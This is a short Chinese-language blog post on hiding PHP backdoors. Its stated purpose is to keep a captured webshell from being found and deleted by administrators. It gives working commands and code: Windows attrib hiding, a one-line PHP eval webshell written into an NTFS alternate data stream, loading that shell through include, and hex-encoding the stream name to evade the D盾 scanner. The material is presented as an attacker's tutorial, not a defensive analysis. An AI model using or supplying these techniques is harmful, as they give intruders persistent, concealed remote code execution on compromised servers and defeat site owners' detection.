php后门隐藏技巧

Posted 2020-11-20 s0mf

Part 1 前言

　　辛辛苦苦拿下的shell，几天没看，管理员给删了。

 

Part 2 隐藏

　　隐藏的技巧很多，废话不多说直接开始。

 

一. attrib +s +h

　　创建系统隐藏文件。

attrib +s +a +r +h  /   attrib +s +h  文件名

 

　　查看隐藏文件

 

二. 利用ADS隐藏文件

　　NTFS交换数据流（Alternate　Data　Streams，简称ADS）是NTFS磁盘格式的一个特性，在NTFS文件系统下，每个文件都可以存在多个数据流。通俗的理解，就是其它文件可以“寄宿”在某个文件身上，而在资源管理器中却只能看到宿主文件，找不到寄宿文件。利用ADS数据流，我们可以做很多有趣的事情。(抄的)

 

　　1.首先创建ADS隐藏文件

在命令行，echo一个数据流进去，比如index文件是正常文件。

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg

这样就生成了一个不可见的 index.php:shell.jpg

 

　　可用 dir /r 命令来查看

　　修改与删除

修改:

　　进入文件所在目录，notepad index.php:shell.jpg

 

如何删除index.php:shell.jpg呢？

　　直接删除index.php

　　

　　2. 文件包含

　　我们生成了index.php:shell.jpg，可以通过包含文件的方式来使用。

<?php include(‘index.php:shell.jpg‘)?>

　　还可以用上面学的隐藏include.php

　　3. 免杀

隐藏了也不行兄dei，D盾一扫瞬间爆炸。

把 index.php:shell.jpg  hex编码

<?php 
$a="696E6465782E7068703A7368656C6C2E6A7067";
 // index.php:shell.jpg hex编码
$b="a";
include(PACK(‘H*‘,$$b))
?>